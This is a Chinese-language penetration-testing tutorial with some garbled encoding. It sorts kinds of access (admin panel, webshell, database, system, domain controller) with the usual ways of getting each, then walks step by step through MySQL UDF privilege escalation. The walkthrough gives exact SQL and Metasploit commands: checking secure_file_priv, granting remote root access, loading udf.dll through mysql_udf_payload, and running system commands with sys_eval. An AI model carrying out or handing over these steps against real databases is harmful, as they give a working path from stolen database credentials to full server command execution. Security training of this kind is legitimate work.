權(quán)限提升基礎(chǔ)信息

1、具體有哪些權(quán)限需要我們了解掌握的？

后臺(tái)權(quán)限，網(wǎng)站權(quán)限，數(shù)據(jù)庫權(quán)限，接口權(quán)限，系統(tǒng)權(quán)限，域控權(quán)限等

2、以上常見權(quán)限獲取方法簡要?dú)w類說明？

后臺(tái)權(quán)限：SQL注入,數(shù)據(jù)庫備份泄露，默認(rèn)或弱口令等獲取帳號(hào)密碼進(jìn)入

網(wǎng)站權(quán)限：后臺(tái)提升至網(wǎng)站權(quán)限，RCE或文件操作類、反序列化等漏洞直達(dá)Shell

數(shù)據(jù)庫權(quán)限：SQL注入,數(shù)據(jù)庫備份泄露，默認(rèn)或弱口令等進(jìn)入或網(wǎng)站權(quán)限獲取后轉(zhuǎn)入

接口權(quán)限：SQL注入,數(shù)據(jù)庫備份泄露，源碼泄漏，培植不當(dāng)?shù)然蚓W(wǎng)站權(quán)限獲取后轉(zhuǎn)入

系統(tǒng)權(quán)限：高危系統(tǒng)漏洞直達(dá)或網(wǎng)站權(quán)限提升轉(zhuǎn)入、數(shù)據(jù)庫權(quán)限提升轉(zhuǎn)入，第三方轉(zhuǎn)入等

域控權(quán)限：高危系統(tǒng)漏洞直達(dá)或內(nèi)網(wǎng)橫向滲透轉(zhuǎn)入，域控其他服務(wù)安全轉(zhuǎn)入等

3、以上常見權(quán)限獲取后能操作的具體事情?

后臺(tái)權(quán)限:

常規(guī)WEB界面文章分類等操作，后臺(tái)功能可操作類

網(wǎng)站權(quán)限：

查看或修改程序源代碼，可以進(jìn)行網(wǎng)站或應(yīng)用的配置文件讀取（接口配置信息，數(shù)據(jù)庫配置信息等），還能收集服務(wù)器操作系統(tǒng)相關(guān)的信息，為后續(xù)系統(tǒng)提權(quán)做準(zhǔn)備。

數(shù)據(jù)庫權(quán)限：

操作數(shù)據(jù)庫的權(quán)限，數(shù)據(jù)庫的增刪改等，源碼或配置文件泄漏，也可能是網(wǎng)站權(quán)限(webshell)進(jìn)行的數(shù)據(jù)庫配置文件讀取獲得。也可以作為提升系統(tǒng)權(quán)限手段。

接口權(quán)限：

后臺(tái)或網(wǎng)站權(quán)限后的獲取途徑：后臺(tái)（修改配置信息功能點(diǎn)），網(wǎng)站權(quán)限（查看的配置文件獲取），具體可以操作的事情大家自己想想。

系統(tǒng)權(quán)限：如同在你自己操作自己的電腦一樣

域控權(quán)限：如同在你自己操作自己的虛擬機(jī)一樣

?

數(shù)據(jù)庫提權(quán)

提權(quán)條件----數(shù)據(jù)庫帳號(hào)密碼獲取，secure-file-priv沒進(jìn)行目錄限制

一、數(shù)據(jù)庫的最高權(quán)限用戶的密碼獲取方式：

0、網(wǎng)站存在高權(quán)限SQL注入點(diǎn)

1、數(shù)據(jù)庫的存儲(chǔ)文件或備份文件

2、網(wǎng)站應(yīng)用源碼中的數(shù)據(jù)庫配置文件

3、采用工具或腳本爆破(需解決外聯(lián)問題)

二、查看secure-file-priv是否有目錄限制，執(zhí)行：show global variables like "secure%"

1、當(dāng)secure_file_priv 的值為 NULL ，表示限制mysqld 不允許導(dǎo)入|導(dǎo)出，無法進(jìn)行提權(quán)。

2、當(dāng)secure_file_priv 的值為 c:/ ，表示限制 mysqld 的導(dǎo)入|導(dǎo)出只能發(fā)生在c盤目錄下，無法進(jìn)行提權(quán)。

3、當(dāng) secure_file_priv的值沒有具體值時(shí)，表示不對 mysqld 的導(dǎo)入|導(dǎo)出做限制，可以提權(quán)。

?

案例：mysql數(shù)據(jù)庫提權(quán)——使用MSF-UDF方式提權(quán)

前提：已獲取數(shù)據(jù)庫高權(quán)限，使用哥斯拉等工具連接。

udf提權(quán)原理

udf的設(shè)計(jì)初衷是為了方便用戶自定義一些函數(shù)，方便查詢一些復(fù)雜的數(shù)據(jù)，同時(shí)也增加

了使用udf提權(quán)的可能。

攻擊者通過編寫調(diào)用cmd或者shell的udf.dll文件，并且導(dǎo)入到一個(gè)指定的文件夾目錄下，

創(chuàng)建一個(gè)指向udf.dll的自定義函數(shù)，從而在數(shù)據(jù)庫中的查詢就等價(jià)于在cmd或者shell中執(zhí)行命令。不同的操作系統(tǒng)，不同的版本，提權(quán)時(shí)導(dǎo)出udf.dll存放的目錄不一樣。

Windows 2000操作系統(tǒng)需要導(dǎo)出udf.dll到c:\winnt\目錄下。Windows2003操作系統(tǒng)導(dǎo)出udf.dll到c:\windows\目錄下。在MySQL 5.1版本及以后的環(huán)境下，udf提權(quán)時(shí)需要將udf.dll導(dǎo)出到mysql安裝目錄\lib\plugin\目錄下。

演示開始：

1.獲取數(shù)據(jù)庫的賬戶和密碼，開始對數(shù)據(jù)庫進(jìn)行鏈接

2.執(zhí)行：show global variables like "secure%"? 查看是否支持提權(quán)。

secure_file_priv沒有值，支持提權(quán)。

3.查看mysql的版本：select version(); 發(fā)現(xiàn)是5.7版本，所以需要將dll文件放在lib\plugin目錄下才可以生效。如果是5.1以下，需要放到 C:\Windows\system32下。

4.查看mysql的安裝路徑（絕對路徑) ：select @@basedir ??

因?yàn)閙ysql=>5.2?，dll文件需要導(dǎo)入到——>mysql安裝目錄/lib/plugin/

5.沒有目錄，如果權(quán)限足夠可用采用手工創(chuàng)建\lib\plugin\目錄，權(quán)限不夠則利用NTFS流創(chuàng)建。?

6.因?yàn)槲覀円褂肕SF，所以需要開啟外鏈。

執(zhí)行：grant all privileges on *.* to '賬戶'@'%' identified by '密碼' with grant option;

mysql數(shù)據(jù)庫user表中出現(xiàn)如下記錄說明成功開啟外鏈。

7.啟動(dòng)msf，使用和配置模板

啟動(dòng)udf模塊。

執(zhí)行：msfconsole

??? use exploit/multi/mysql/mysql_udf_payload

配置模板

執(zhí)行：set username 數(shù)據(jù)庫用戶名

??? set password 數(shù)據(jù)庫密碼

??? set rhosts 目標(biāo)主機(jī)地址

導(dǎo)入dll文件到lib\plugin\目錄

執(zhí)行：run

成功生成：

8.使用MSF導(dǎo)出utf.dll文件后，在執(zhí)行如下命令調(diào)用執(zhí)行

執(zhí)行：create?function?sys_eval?returns?string?soname?"udf.dll";?? //創(chuàng)建函數(shù)綁定dll

執(zhí)行：select * from mysql.func;????? //查看是否新增了sys_eval函數(shù)

9.此時(shí)就可以使用sys_eval函數(shù)執(zhí)行命令了

執(zhí)行：select sys_eval('whoami');

番外：還可以使用啟動(dòng)項(xiàng)模塊：exploit/windows/mysql/mysql_start_up ，需要等待目標(biāo)服務(wù)器重啟利用。

具體利用方法：https://blog.csdn.net/weixin_43801718/article/details/105493042